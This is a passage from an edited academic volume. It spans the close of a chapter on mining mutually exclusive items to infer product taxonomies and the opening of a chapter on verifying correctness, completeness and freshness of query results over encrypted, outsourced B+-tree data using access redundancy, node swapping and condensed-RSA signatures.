DISCUSSION We apply a level-wise technique in order to extract the contiguous frequent itemsets and then the mutually exclusive items. The intuition behind this approach is twofold: First, if these extensions are frequent, indeed, in the subspace of a frequent itemset, then there could be important information about these itemsets lost for a number of reasons. Second, if a large number of itemsets share the same extensions and these common extensions are frequent in the subspace of these itemsets, then they are likely to be mutually exclusive and possibly of the same category and the same level of taxonomy. In such cases, the total support of
2200
the parent node in the taxonomy is broken down into many lower-level supports, which are not high enough to satisfy the minimum set threshold, which explains the possible loss of potentially valuable knowledge. The support of the current itemset is reduced, because of the low support of the extensions and eventually fails to qualify as a frequent itemset. When no taxonomy information is available in advance, the information gathered from this process can be a valuable hint about the taxonomy effect explained here and eventually the existence of taxonomy. Mining a transaction database to discover the underlying taxonomy is an elusive task with questionable results. In the existing applications,
Mining for Mutually Exclusive Items in Transaction Databases
the existence of taxonomy assists the miner in discovering valuable knowledge. In our set up, the “Holy Grail” would be exactly the inverse procedure. In a mining problem where no taxonomy information is provided in advance, is it possible to follow a kind of reverse engineering procedure in order to mine nuggets of taxonomy information from the data? If so, then the benefit would be twofold. First, the domain expert would be provided with pieces of potentially valuable knowledge about concept hierarchies among items in the database. Second, this knowledge could be used again to mine for multiple-level or generalized association rules, especially those hierarchical relationships that the expert verifies or wants to test for validity. The knowledge that two items are mutually exclusive can be further analyzed in order to decide whether the two products could be included in the same level of taxonomy and under the same parent node. Searching for mutually exclusive pairs of items in a “blind” manner would produce a huge number of candidate pairs. Moreover, most of the discovered mutually exclusive items would be uninteresting. The intuition behind searching for mutually exclusive items between the extensions of frequent itemsets is twofold. First, the search space is reduced sensibly, and second, a frequent itemset represents a class of consumers that have particular preferences. So, the mutually exclusive items found in the subspace of a frequent itemset are probably more interesting. For example, consider a large store that sells clothes,
shoes, sportswear, and so forth. Also, consider itemset A = {Socks, AthleticShoes, Rackets}, represents athletes who play tennis, and itemset B = {Socks, AthleticShoes, Handball}, represents athletes who play handball. Itemsets A and B may not have high support, while itemset C = A∩B = {Socks, AthleticShoes} is more likely to have higher support, since it represents the whole class of athletes. However, the two items, Rackets and Handball are expected to be locally frequent in the subset of transactions containing C. The use of traditional association rules does not provide the alternative to explore the C-subspace, and consequently, a large amount of potentially valuable knowledge will remain hidden. Conversely, with our algorithm, Rackets and Handball would be discovered as mutually exclusive items indicating a taxonomical relationship. The taxonomy generation is needed in many domains. Although taxonomies already exist, they may require refinement either because the consumers’ preferences change over time, because new products are produced, or even because some considerations made when the taxonomy was built were false. Moreover, consumers’ preferences vary in different locations and consequently the taxonomies are different. For example, a taxonomy used in a supermarket in a highland place is not appropriate for a supermarket located near the sea. Finally many different taxonomies can be built for a set of items depending on the various view points. Returning to the example, maybe there is not any taxonomy containing Rackets and
Figure 5. A taxonomy of coffee products
Table 5. Generalized association rules, using the taxonomy discovered
Coffee
Espresso
Cappuccino
Decaf
Association rules
Support
Confidence
sugar ⇒ coffee
7/9
1
coffee ⇒ sugar
7/9
7/9
2201
Mining for Mutually Exclusive Items in Transaction Databases
Handball at the same level and under the same parent node. Probably, a new taxonomy should be created or an old one should be refined. Now, let us return to the example. The extracted mutually exclusive pairs of items listed in Table 4 are all different types of coffee (espresso, cappuccino, and decaffeinated). If we consider them as items of the same level of taxonomy (Figure 5) and replace these items with a single item (the parent node, i.e., coffee), we are able to increase the minimum support threshold in order to acquire stronger association rules (Table 5).
CONCLUSION In this article, we have presented the novel problem of mining for mutually exclusive items, as an extension to the association rules mining paradigm. When two items are mutually exclusive, this can be used as a valuable hint, when looking for previously unknown taxonomical relationships among them. In such a case, this can be an interesting type of knowledge to the domain expert, but more importantly, it can be used to mine the database for hierarchical or generalized association rules. For this purpose, we proposed an intuitive approach and formulated the problem, providing definitions of terms and evaluation metrics. We also have developed a mining algorithm, which extends Apriori, and we have applied it on a large synthetic dataset in order to test its performance. In the future, we would like to apply our approach on real-world data sets in order to further investigate its performance.
SIGMOD Conference on Management of Data (pp. 207-216). Agrawal, R., Mannila, H., Srikant, R., Toivonen, H., & Verkamo, A. I. (1996). Fast discovery of association rules. In U. M. Fayyad, G. PiatetskyShapiro, P. Smyth, & R. Uthurusamy (Eds.), Advances in knowledge discovery and data mining (pp. 307-328). Menlo Park, CA: AAAI Press. Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules in large databases. In Proceedings of the International Conference on Very Large Databases (pp. 487-499). Berberidis, C., Angelis, L., & Vlahavas, I. (2004). PREVENT: An algorithm for mining intertransactional patterns for the prediction of rare events. In Proceedings of the 2nd European Starting AI Researcher Symposium (pp. 128-136). Berberidis, C., Tzanis, G., & Vlahavas, I. (2005). Mining for contiguous frequent itemsets in transaction databases. In Proceedings of the IEEE 3rd International Workshop on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications. Chen, X., & Petrounias, I. (2000). Discovering temporal association rules: Algorithms, language and system. In Proceedings of the 16th International Conference on Data Engineering. Han, J., & Fu, Y. (1994). Dynamic generation and refinement of concept hierarchies for knowledge discovery in databases. In AAAI Workshop on Knowledge Discovery in Databases (pp. 157168).
REFERENCES
Han, J., & Fu, Y. (1995). Discovery of multiplelevel association rules from large databases. In Proceedings of the 21st International Conference on Very Large Databases (pp. 420-431).
Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining anssociation rules between sets of items in large databases. In Proceedings of the ACM
Han, J., Pei, J., & Yin, Y. (2000). Mining frequent patterns without candidate generation. In Pro-
2202
Mining for Mutually Exclusive Items in Transaction Databases
ceedings of the 2000 ACM SIGMOD International Conference on Management of Data (pp. 1-12). Koperski, K., & Han, J. (1995). Discovery of spatial association rules in geographic information databases. In Proceedings of the 4th International Symposium on Large Spatial Databases (pp. 47-66). Mannila, H., Toivonen, H., & Verkamo, A. I. (1994). Efficient algorithms for discovering association rules. In Proceedings of AAAI Workshop on Knowledge Discovery in Databases (pp. 181-192). Savasere, A., Omiecinski, E., & Navathe, S. B. (1998). Mining for strong negative associations in a large database of customer transactions. In Proceedings of the 14th International Conference on Data Engineering (pp. 494-502).
Teng, C. M. (2002). Learning form dissociations. In Proceedings of the 4th International Conference on Data Warehousing and Knowledge Discovery (pp. 11-20). Thomas, S., & Sarawagi, S. (1998). Mining generalized association rules and sequential patterns using SQL queries. In Proceedings of the 4th International Conference on Knowledge Discovery and Data Mining (pp. 344-348). Tung, A. K. H., Lu, H., Han, J., & Feng, L. (2003). Efficient mining of intertransaction association rules. IEEE Transactions on Knowledge and Data Engineering, 15(1), 43-56. Wu, X., Zhang, C., & Zhang, S. (2004). Efficient mining of both positive and negative association rules. ACM Transactions on Information Systems, 22(3), 381-405.
Srikant, R., & Agrawal, R. (1995). Mining generalized association rules. In Proceedings of the 21st VLDB Conference (pp. 407-419).
This work was previously published in International Journal of Data Warehousing and Mining, Vol. 3, Issue 3, edited by D. Taniar, pp. 45-59, copyright 2007 by IGI Publishing (an imprint of IGI Global).
2203
2204
Chapter 7.15
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data Tran Khanh Dang National University of Ho Chi Minh City, Vietnam
ABSTRACT In an outsourced database service model, query assurance takes an important role among wellknown security issues. To the best of our knowledge, however, none of the existing research work has dealt with ensuring the query assurance for outsourced tree-indexed data. To address this issue, the system must prove authenticity and data integrity, completeness, and freshness guarantees for the result set. These objectives imply that data in the result set is originated from the actual data owner and has not been tampered with; the server did not omit any tuples matching the query conditions; and the result set was generated with respect to the most recent snapshot of the database. In this paper, we propose a vanguard solution to provide query assurance for outsourced tree-indexed data on untrusted servers with high query assurance and at reasonable costs. Experimental results
with real datasets confirm the effciency of our approach and theoretical analyses.
INTRODUCTION Outsourcing database services is emerging as an important new trend thanks to continued growth of the Internet and advances in the networking technology. Organizations outsource their data management needs to an external service provider, thereby freeing them to concentrate on their core business. In this outsourced database service (ODBS) model, organizations rely on the premises of external service providers, which include hardware, software, and manpower, for the storage and retrieval management of their data, and they operate other business applications via the Internet without having to maintain applications in-house. Figure 1 depicts key “actors” in
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
Figure 1. The ODBS model and security threats at the server side
Outside Attackers Inside Attackers
Data Owner(s) Internet
Server Outsourced Database Outside Attackers
Clients
the most general and complicated ODBS model (Mykletun, Narasimha, & Tsudik, 2004),1 where multiple data owners (say, separate departments of an organization) outsource their data to a certain database server (which may be untrusted) and allow users (may be other departments, partners of the organization, or even themselves) to access the outsourced data. This service model is a recent and important manifestation of the outsourcing trend of different information technology services. As we can see, however, among issues needing to be addressed in order to make this model reality, security-related issues must be of crucial concern due to the fact that the server may be untrusted, and both data as well as users’ queries can now be exposed to the server and hackers/malicious users (corresponding to inside and outside attackers as shown in Figure 1, respectively). This means that, in this ODBS model, apart from secure network communication channels and other necessary security procedures at the user side (Axelrod, 2004), efficient and effective solutions to security threats inside the server are indispensable. We discuss in more detail these server-side security-related issues below.
Untrusted Server
Security Issues in the ODBS Model Since a service provider is typically not fully trusted, the ODBS model raises numerous interesting research challenges related to security issues. First of all, because the life-blood of every organization is the information stored in its databases, making outsourced data confidential is therefore one of the foremost challenges in this model. In addition, privacy-related concerns must also be taken into account due to their important role in real-world applications.2 Not less importantly, in order to make the outsourced database service viable and really applicable, the query result must also be proven qualified. This means the system has to provide users with some means to verify the query assurance claims of the service provider. Overall, most crucial security-related research questions in the ODBS model relate to the below issues: •
Data confidentiality: Outsiders and the server’s operators (database administrator– DBA) cannot see the user’s outsourced data contents in any cases (even as the user’s queries are performed on the server).
2205
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
•
•
•
2206
User privacy: Users do not want the server and even the DBA to know about their queries and the results. Ensuring the user privacy is one of the keys to the ODBS model’s success. Data privacy: Users are not allowed to get more information than what they are querying on the server. In many situations, users must pay for what they have got from the server and the data owner does not allow them to get more than what they have paid for, or even users do not want to pay for what they do not need because of the low bandwidth connections, limited memory/ storage devices, and so forth. This security objective is not easy to obtain and a cost-efficient solution to this issue is still an open question (Dang, 2006b). Query assurance: Users are able to verify the correctness (authenticity and data integrity), completeness, and freshness of the result set. Among all security objectives, the query assurance is always appealed in the ODBS model. We succinctly explain these concepts as follows, and more discussions can be found in Narasimha and Tsudik (2006), Mykletun et al. (2004), Boneh, Gentry, Lynn, and Shacham (2003), Pang and Tan (2004), Pang, Jain, Ramamritham, and Tan (2005), and Sion (2005): ◦ Proof of correctness: As a user queries outsourced data, it expects a set of tuples satisfying all query conditions and also needs assurance that data returned from the server originated from the data owner and have not been tampered with either by an outside attacker or by the server itself. ◦ Proof of completeness: As a user queries outsourced data, completeness implies that the user can verify that the server returned all tuples matching all query conditions, that is, the server did not omit any tuples satisfying the query conditions. Note that a server,
which is either malicious or lazy, might not execute the query over the entire database and might return no or only partial results. Ensuring the query result completeness aims to detect this unexpected behavior. ◦ Proof of freshness: The user must be ensured that the result set was generated with respect to the most recent snapshot of the database. This issue must be addressed so as to facilitate dynamic outsourced databases, which frequently have updates on their data. The above security requirements differ from the traditional database security issues (Castano, Fugini, Martella, & Samarati, 1995; Umar, 2004) and will in general influence the performance, usability, and scalability of the ODBS model. Although there exist a number of research works on the above topics (e.g., Du & Atallah, 2000; Hacigümüs, Iyer, Li, & Mehrotra, 2002a; Bouganim & Pucheral, 2002; Damiani, Vimercati, Jajodia, Paraboschi, & Samarati, 2003; Lin & Candan, 2004; Chang & Mitzenmacher, 2004; Dang, 2006a, 2006b), to the best of our knowledge, none of them has dealt with the problem of ensuring query assurance for outsourced tree-indexed data. It has been clearly proven in the literature that tree-indexed data have played an important role in both traditional and modern database applications (Dang, 2003). Therefore, security issues in query assurance for outsourced tree-indexed data need to be addressed completely in order to materialize the ODBS model. This is even then not a trivial task, especially as tree-based index structures are outsourced to untrusted servers (Du & Atallah, 2000; Dang, 2005). In this article, we will discuss and propose solutions to security issues in order to provide query assurance for dynamic outsourced databases that come together with tree-based index structures. Our techniques allow users to operate on their outsourced treeindexed data on untrusted servers with high query
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
assurance and at reasonable costs. Our proposed solutions will address all three desired security properties of query assurance. In addition, as presented in Du and Atallah (2000), Mykletun et al. (2004), and Dang (2006b), there are a number of different ODBS models depending on desired security objectives. In this article, however, due to the complexity of the big problem, we will focus on the most basic and typical ODBS model where only data confidentiality, user privacy, and query assurance objectives should be taken into account. Our holistic solution allows users (also the data owners in our considered ODBS model) to manipulate their outsourced data as it is being stored in in-house database servers. The rest of this article is organized as follows. We briefly summarize main related work and introduce a state-of-the-art approach to managing outsourced tree-indexed data without query assurance considerations. After that, we present our contributions to completely solve the problem of query assurance in dynamic outsourced treeindexed data. We then show experimental results with real datasets and brief security analyses
in order to establish the practical value of our proposed solutions. Finally, the last section gives conclusions and future work.
RELATED WORK Although various theoretical problems concerning computation with encrypted data and searching on encrypted data have appeared in the literature (Fong, 2003), the ODBS model which heavily depends on data encryption methods emerged not long ago (Du & Atallah, 2000; Hacigümüs, Mehrotra, & Iyer, 2002b; Dang, 2006b). Even then it rapidly got special attention from the research community due to a variety of conveniences brought in as well as interesting research challenges related (Dang, 2005). The foremost research challenge relating to security objectives for the model was introduced in the previous section. In Figure 2 we diagrammatically summarize security issues in the ODBS model, together with major references to the corresponding state-of-the-art solutions.
Figure 2. Security issues in the ODBS model User Privacy (Hacigümüs,2002a; Lin et al., 2004; Chang et al., 2004; Dan , 2006a
Confidentiality (Bouganim et al., 2002; Damiani et al., 2003; Dang, 2005)
ODBS model (Du et al., 2000; Hacigümüs,2002b; Dang, 2006b)
Privacy
Data Privacy (Gertner et al., 1998; Du et al., 2000; Dang, 2006b)
Correctness
Auditing
(Boneh et al., 2003; Mykletun et al., 2004; Pang et al., 2004; Pang et al., 2005; Narasimha et al., 2006; Sion, 2005; Nguyen et al., 2007; this paper)
(Burmester et al., 2004; Dang, 2006b)
Completeness
Query Assurance
(Pang et al., 2005; Narasimha et al., 2006; Sion, 2005; Nguyen et al., 2007; this paper)
Freshness (this paper)
2207
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
As shown in Figure 2, most security objectives of the ODBS model have been investigated. To deal with data confidentiality issue, most approaches adopted to encrypt (outsourced) data before its being stored at the external server (Bouganim & Pucheral, 2002; Damiani et al., 2003; Dang, 2005). Although this solution can protect the data from outsiders as well as the server, it introduces difficulties in the querying process, as it is hard to ensure the user and data privacy when performing queries over encrypted data. In general, to address the privacy issue (including both user and data privacy), outsourced data structures (tree or non-tree based) that are employed to manage the data storage and retrieval should be considered. Notably, the problem of user privacy has been well solved, even without special hardware (Smith & Safford, 2001), if the outsourced database contains only encrypted records and no tree-based indexes are used for storage and retrieval purposes (see Dang, 2006b, for an overview). Conversely, the research result is less incentive if such trees are employed, although some proposals have been made recently (Lin & Candan, 2004; Dang, 2006b). In our previous work (Dang, 2006b), we did propose an extreme protocol for the ODBS model based on private information retrieval (PIR)-like protocols (Asonov, 2001). It would, however, become prohibitively expensive if only one server were used to host the outsourced data (Chor, Goldreich, Kushilevitz, & Sudan, 1995). Damiani et al. (2003) also gave a solution to query-outsourced data indexed by B+trees, but their approach does not provide an obvious way to traverse the tree, and this may lead to compromised security objectives (Lin & Candan, 2004; Dang, 2006a). Lin and Candan (2004) introduced a computational complexity approach to solve the problem with sound experimental results reported. Their solution, however, only supports obvious search operations on outsourced search trees, insert, delete, and modification ones. That means their solution cannot be applied to dynamic outsourced search trees where several items may
2208
be inserted into and removed from, or existing data can be modified. In our recent work (Dang, 2006a), we analyzed and introduced techniques to completely solve the problem of data confidentiality and user privacy, but query assurance, in the ODBS model with dynamic tree-indexed data supports. In the next sections we will elaborate on these techniques and extend them in order to deal with the three security objectives of query assurance as mentioned above. Contrary to user privacy, although there are initial research activities (Gertner, Ishai, Kushilevitz, & Malkin, 1998; Du & Atallah, 2000; Dang, 2006b), the problem of data privacy still needs much more attention. Gertner et al. (1998) first considered the data privacy issue in the context of PIR-like protocols and proposed the so-called SPIR, symmetrical PIR, protocol in order to prevent users from knowing more than the answers to their queries. Unfortunately, such PIR-based approaches cannot be applied to the ODBS model because the data owners in PIR-like protocols are themselves the database service providers. Du and Atallah (2000) introduced protocols for secure remote database access with approximate matching with respect to four different ODBS models requiring different security objectives among those presented in the previous section. Even so, their work did not support outsourced tree-indexed data. In our recent work (Dang, 2006b), we presented a solution to ensuring data privacy in the ODBS model which can be applied to tree-indexed data as well. Nevertheless, our proposed solution must resort to a trusted third party, which is not easy to find in practice. Recently, addressing the three issues of query assurance has also attracted many researchers and, as a result, a number of solutions have been proposed (e.g., Boneh et al., 2003; Mykletun et al., 2004; Pang & Tan, 2004; Pang et al., 2005; Narasimha & Tsudik, 2006; Sion, 2005; Nguyen, Dang, Son, & Kueng, 2007). We must even now note that none of them has given a solution to the problem of guaranteeing the query result
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
freshness (see Figure 2).3 To prove the correctness of a user’s query results, the state-of-the-art approaches (Boneh et al., 2003; Mykletun et al., 2004; Pang & Tan, 2004; Sion, 2005) employed some aggregated/condensed digital signature scheme to reduce the communication and computation costs. First, Boneh et al. (2003) introduced an interesting aggregated signature scheme that allows aggregation of multiple signers’ signatures generated from different messages into one short signature based on elliptic curves and bilinear mappings. This scheme was built based on a “Gap Diffie-Hellman” group where the Decisional Diffie-Hellman problem is easy while the Computational Diffie-Hellman problem is hard (Joux & Nguyen, 2001). Despite the big advantage that this scheme can be applied to different ODBS models, it must bear a disadvantage related to the performance. As shown in Mykletun et al. (2004), the computational complexity of Boneh et al.’s (2003) scheme is quite high for practical uses in many cases. Second, Mykletun et al. (2004) introduced a RSA-based condensed digital signature scheme that can be used for ensuring authenticity and data integrity in the ODBS model. Their scheme is concisely summarized as follows.
Condensed-RSA Digital Signature Scheme Suppose pk=(n, e) and sk=(n, d) are the public and private keys, respectively, of the RSA signature scheme, where n is a k-bit modulus formed as the product of two k/2-bit primes p and q. Assume φ(n)=(p-1)(q-1), both public and private exponents e, d∈Z n* and must satisfy ed ≡ 1 mod φ(n). Given t different messages {m1, ..., mt} and their corresponding signatures {s1, ..., st} that are generated by the same signer, a condensed-RSA signature is computed as follows: s1,t =∏ti=1si mod n. This signature is of the same size as a single standard RSA signature. To verify the correctness of t received messages, the user must multiply
the hashes of all t messages and check that (s1,t)e ≡ ∏ti=1h(mi) mod n. As we can see, the above scheme is possible due to the fact that RSA is multiplicatively homomorphic. We will apply this scheme to our ODBS model in order to provide correctness guarantees of the received tree nodes from the server (see the section on “Correctness Guarantees”). Note that, however, this scheme is applicable only for a single signer’s signatures. Sion (2005) also employed this approach to deal with the correctness of query results in his scheme. Besides, Pang and Tan (2004) applied and modified the idea of “Merkle Hash Trees” (MHT) (Merkle, 1980) to provide a proof of correctness for edge computing applications, where a trusted central server outsources parts of the database to proxy servers located at the edge of the network. In Narasimha and Tsudik (2006), however, the authors pointed out possible security flaws in this approach. Furthermore, there are also some approaches to deal with the completeness of a user’s query results (Sion, 2005; Pang et al., 2005; Narasimha & Tsudik, 2006). First, Sion (2005) proposed a solution to provide such assurances for arbitrary queries in outsourced database frameworks. The solution is built around a mechanism of runtime query “proofs” in a challenge-response protocol. More concretely, before outsourcing the data, the data owner partitions its data into k segments {S1, ..., Sk}, computes hashes for each segment, H(Si), i=1, k , then stores (outsources) them all together at the service provider’s server. In addition, the data owner also calculates some “challenge tokens” with respect to Si. Actually, the challenge tokens are queries that the data owner already knows their results, which can be used for verification later. Whenever a batch of queries are sent to the server, certain challenge token(s) are also sent together. The result set is then verified using the challenge tokens for its completeness. Although this approach can be applied to different query types, not 100% of the query assurance (the
2209
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
completeness) can be guaranteed because there are chances for a malicious server to “get away” with cheating in the query execution phase (i.e., the server only needs to “guess” and return the correct answer to the challenge token together with fake result sets for other queries in the batch, but nothing else). Moreover, this approach also introduces cost inefficiency for database updates because the challenging answers must be recalculated. Seriously, although the author did not aim to address the user privacy issue in the article, we should note that user privacy in this approach may be compromised because the server knows what data segments are required by the user so inference and linking attacks can be conducted (Dang, 2006b; Damiani et al., 2003). Second, Pang et al. (2005) introduced a solution based on aggregated signature schemes and MHT to provide the completeness of the query result. This approach is an extension of that presented in their previous work (Pang & Tan, 2004), which has been proven insecure due to some possible security flaws (Narasimha & Tsudik, 2006). Last, Narasimha and Tsudik (2006) developed an approach, called digital signature aggregation and chaining (DSAC), which achieves both correctness and completeness of query replies. However, in their approach, tuples must be pre-sorted in ascending order with respect to each searchable dimension for calculation of the signature chain, and thus it still does not support outsourced tree-indexed data where the order of tree nodes’ contents is not able to be determined. This pre-sorting requirement also has a negatively tremendous impact on data updates, hence the total performance of the system will be degenerated. Apart from the security issues mentioned above and in the previous section, as we can observe in Figure 2, there exists another question: How can the server conduct auditing activities in systems provided with such security guarantees (without employing special hardware equipment)? The server may not know who is accessing the system (e.g., Dang, 2006b), what they are asking
2210
for, what the system returns to the user, and thus how it can effectively and efficiently tackle the accountability or develop intrusion detection/prevention systems. The goals of privacy-preserving and accountability appear to be in contradiction, and an efficient solution to balance the two is still open. More discussions about this topic can be found in Burmester, Desmedt, Wright, and Yasinsac (2004). In the next section we will elaborate on the state-of-the-art approach proposed in Dang (2006a) to managing the storage and retrieval of dynamic outsourced tree-indexed data, and in the section after that we will extend this approach to strengthen it with query assurance supports, including all the three concerned security objectives.
A PRAGMATIC APPROACH TO MANAGING OUTSOURCED TREE-INDEXED DATA As discussed in the literature, tree-based index structures take an indispensable role in both traditional and modern database applications (Dang, 2003). However, in spite of their advantages these index structures introduce a variety of difficulties in the ODBS model (Du & Atallah, 2000; Dang, 2006b). To detail the problem, Figure 3a illustrates an example of the B+-tree for an attribute CustomerName with sample values. All tree nodes were encrypted before being stored at the outsourcing server to ensure the data confidentiality. Assume that a user is querying all customers whose name is Ha on this tree. If we do not have a secure mechanism for the query processing, a sequence of queries that will access in sequence nodes 0, 1, and 5 with respect to the above query will be revealed to the server. In addition, the server also realizes that the user was accessing nodes 0, 1, and 5, and node 0 is the root, node 1 is an internal node, node 5 is a leaf node of the tree, and so the user privacy is compromised. More seriously, using such information collected
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
Figure 3. An example of the B+-tree (a) and the corresponding plaintext and encrypted table (b) 0
John
1
2 Bob
Rose Trang
Ha
3
4
Alice Anne
Bob Carol
5
6 Ha
7
John Linh
Rose
8 Son
Trang
(a) B+Tree NID
Node
NID
EncryptedNode
0
(1,John,2,-,-1)
0
D0a1n2g3Kh75nhs&
1
(3,Bob,4,Ha,5)
1
T9&8ra§ÖÄajh³q91
2
(6,Rose,7,Trang,8)
2
H&$uye”μnÜis57ß@
3
(Alice,Anne,4)
3
L?{inh*ß²³&§gnaD
4
(Bob,Carol,5)
4
Wh09a/[%?Ö*#Aj2k
5
(Ha,-,6)
5
j8Hß}[aHo$§angμG
6
(John,Linh,7)
6
#Xyi29?ß~R@€>Kh
7
(Rose,Son,8)
7
~B³!jKDÖbd0K3}%§
8
(Trang,-,-1)
8
T-§μran&gU19=75m
(b) B+Table and B+EncryptedTable
gradually, together with statistical methods, data mining techniques, and so forth, the server can rebuild the whole tree structure and infer sensitive information from the encrypted database, hence data confidentiality can also be spoiled. Besides, during the querying, the user will also get more information showing that there are at least two other customers named John and Bob in the database, so the data privacy is not satisfied (note that, however, we will not address the data privacy problem in this article). Although Damiani et al. (2003) proposed an approach to outsourced tree-based index structures, it unfortunately has some security flaws that may compromise the desired security objectives (Dang, 2005, 2006b). Lin and Candan (2004) and Dang (2006a) developed algorithms based on access redundancy and node-swapping techniques to address security issues of outsourced tree-indexed
data. We briefly summarize their solutions in the rest of this section. Obviously, as private data is outsourced with search trees, the tree structure and data should all be confidential. As shown in Damiani et al. (2003), encrypting each tree node as a whole is preferable because protecting a tree-based index by encrypting each of its fields would disclose to the server the ordering relationship between the index values. Lin and Candan’s (2004) approach also follows this solution and, like others (Dang, 2005, 2006a; Damiani et al., 2003), the unit of storage and access in their approach is also a tree node. Each node is identified by a unique node identifier (NID). The original tree is then stored at the server as a table with two attributes: NID and an encrypted value representing the node content. Consider an example: Figure 3a shows a B+-tree built on an attribute CustomerName; Figure 3b
2211
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
shows the corresponding plaintext and encrypted table used to store the B+-tree at the external server. As we can see, that B+-tree is stored at the external server as a table over schema B+EncryptedTable = {NID, EncryptedNode}. Based on the above settings, Lin and Candan (2004) proposed an approach to oblivious traversal of outsourced search trees using two adjustable techniques: access redundancy and node swapping.
that this technique must re-encrypt nodes using a different encryption scheme/key (see Lin & Candan, 2004, for details). The authors proved that, with this technique, the possible position of the target node is randomly distributed over the data storage space at the untrusted server, and thus the weakness of the access redundancy technique is overcome.
Access Redundancy
To realize oblivious traversal of outsourced search trees, some more critical issues must also be addressed:
Whenever a user accesses a node, called the target node, it asks for a set of m-1 randomly selected nodes in addition to the target node from the server. Hence, the probability that the server can guess the target node is 1/m. This technique is different from those presented in Damiani et al. (2003), where only the target node is retrieved (this may lead to reveal the tree structure as shown in Dang, 2005, 2006b). Besides the access redundancy, it also bears another weakness: it can leak information on the target node position. This is easy to observe: multiple access requests for the root node will reveal its position by simply calculating the intersection of the redundancy sets of the requests. If the root position is disclosed, there is a high risk that its child nodes (and also the whole tree structure) may be exposed (Lin & Candan, 2004). This deficiency is overcome by secretly changing the target node’s address after each time it is accessed.
Additional Procedures
•
•
•
Node Swapping Each time a user requests to access a node from the server, it asks for a redundancy set of m nodes consisting of at least one empty node along with the target one. The user then: (1) decrypts the target node, (2) manipulates its data, (3) swaps it with the empty node, and (4) re-encrypts all m nodes and writes them back to the server. Note
2212
•
Managing root node address: The authors proposed to employ a special entry node called SNODE whose NID and decryption key are known to all valid users. It keeps pointers ROOTS pointing to the root nodes of all outsourced search trees that the user can access. Managing empty node lists: Empty nodes are stored in hidden linked lists. To help users find out the empty nodes, two other types of pointers are also stored in the SNODE: EHEADS and ETAILS point to the heads and tails of empty node lists, respectively. Random choice for redundancy sets: A redundancy set consists of the target node, an empty node, and m-2 randomly selected nodes. To enable users to do this, the SNODE records the range of NIDs of nodes in the data storage space at the server. The user will then be able to generate m-2 random NIDs within the range. Managing the tree structure integrity: This aims to maintain node/parent-node relationships after the node swapping. The first solution is to find the empty node to be swapped with the child node and update the parent node accordingly before actually swapping the child node. The second solution
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
•
is to let users keep track of all nodes from the root down, deferring all the swaps until the node containing the data is accessed. Concurrency control in the multi-user environment: The authors also presented a solution to concurrency control without deadlocks. The main idea of the proposed solution is to organize nodes in the data storage space at the server into d levels, and each level requires an empty node list to store empty nodes at this level. Besides, all users access nodes in some fixed predetermined order, ensuring deadlock-free access in a multi-user environment. See Lin and Candan (2004) for detailed discussions about the proposed solutions to all of these critical issues.
Although Lin and Candan’s (2004) approach only supports oblivious tree search operations, the two above techniques have served as the basis for our further investigation. Based on the access redundancy and node-swapping techniques, in Dang (2006a) we developed practical algorithms for privacy-preserving search, insert, delete, and modify operations that can be applied to a variety of dynamic outsourced tree-based index structures and the unified user model where data owners are also sole users of the system (see Mykletun et
al., 2004; Du & Atallah, 2000; Dang, 2006b, for more details about ODBS models). Although our previous work provided the vanguard solutions for this problem with sound empirical results, it did not consider the query assurance problem. In the next section we will extend our previous work to address this problem. Note that, however, as with the unified user model, it is not necessary to take into account, in the remainder of this article, the clients as shown in Figure 1. The key “actors” in our concerned ODBS model now consist only of the data owners and the outsourcing database server.
QUERY ASSURANCE FOR OUTSOURCED TREE-INDEXED DATA In this section, we present an extension of our previous work in Dang (2006a), which introduced solutions to the problems of data confidentiality and user privacy in the ODBS model (with respect to the unified user model), in order to incorporate solutions to ensuring the correctness, completeness, and freshness of the query results. The next section will detail the experimental results with real datasets.
Figure 4. EncryptedTable with tree node contents’ signatures B+Table NID 0 1 2 3 4 5 6 7 8
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
Correctness Guarantees As introduced in the first section, to guarantee the correctness of the query result set, the system must provide a means for the user to verify that the received data originated from the data owner as it is. As analyzed in previous sections, the state of the art employed the public key cryptography scheme to deal with this problem. With respect to our concerned ODBS model, where data privacy considerations are omitted and only single signer (i.e., only one data owner or multiple data owners using the same signature scheme) participates in the query processing, the RSA-based signature scheme is the most suitable as already discussed. In our context, outsourced tree-indexed data is stored at the server side as described in the previous section⎯that is, as a table over schema EncryptedTable = {NID, EncryptedNode}. Before outsourcing the data, the data owner computes the hash h(m) of each encrypted node m. Here, h() denotes a cryptographically strong hash function (e.g., SHA-1). The data owner then “signs” that encrypted node m by encrypting h(m) with its private/secret key sk and stores the signatures together with EncryptedTable at the server. The table schema stored at the server therefore becomes EncryptedTable = {NID, EncryptedNode, Signature} (see Figure 4).4 With these settings, users5 can then verify each returned node using the data owner public key pk, hence ensuring the correctness of the result set. Although the naive approach above ensures the security objective, it is expensive because the number of signatures to verify equals the redundancy set size. To solve this issue, we employ the condensed-RSA digital signature scheme based on the fact that RSA is multiplicatively homomorphic as presented in the previous section as follows: Given t input encrypted nodes {m1, ..., mt} (the redundancy set) and their corresponding signatures {s1, ..., st}, the server computes a condensed-RSA signature s1,t as the product of these
2214
individual signatures and sends it together with the redundancy set to the user. The user, in turn, will be able to verify the condensed signature s1,t by employing the hashes computed from all received nodes (in the corresponding redundancy set) as shown in the previous section. With this method, not only the query result correctness is ensured, but both communication and computation costs are also tremendously reduced. Note that in this case the server has to send only one condensed-RSA signature s1,t to the user for verification instead of t individual ones. In the following section we will show the experimental results.
